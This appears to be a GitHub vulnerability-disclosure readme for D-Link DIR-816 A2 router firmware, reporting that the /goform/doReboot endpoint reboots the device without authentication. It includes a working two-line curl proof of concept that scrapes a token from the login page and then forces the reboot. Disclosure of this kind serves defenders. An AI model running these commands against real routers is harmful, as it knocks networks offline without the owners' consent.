Skip to content

Latest commit

 

History

History
34 lines (20 loc) · 874 Bytes

readme.md

File metadata and controls

34 lines (20 loc) · 874 Bytes

D-link DIR-816 A2_v1.10CNB04.img Reboot router without authentication

Firmware information

Affected version

The picture above shows the latest firmware for this version

Vulnerability details

Vulnerability occurs in /goform/doReboot , No authentication is required, and reboot is executed when the function returns at the end

Poc

The first thing you need to do is to get the tokenid

curl http://192.168.0.1/dir_login.asp | grep tokenid

Then run the following poc

curl -i -X POST http://192.168.0.1/goform/doReboot -d tokenid=xxxx

The router will then reboot